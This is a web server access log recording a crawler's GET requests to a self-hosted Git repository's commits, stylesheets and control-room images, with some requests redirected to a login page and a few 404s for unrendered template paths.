"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2FDockerfile" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13215] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13225] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10961] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10956] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13217] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10962] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:55 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:41:55 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:42:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10959] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13212] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 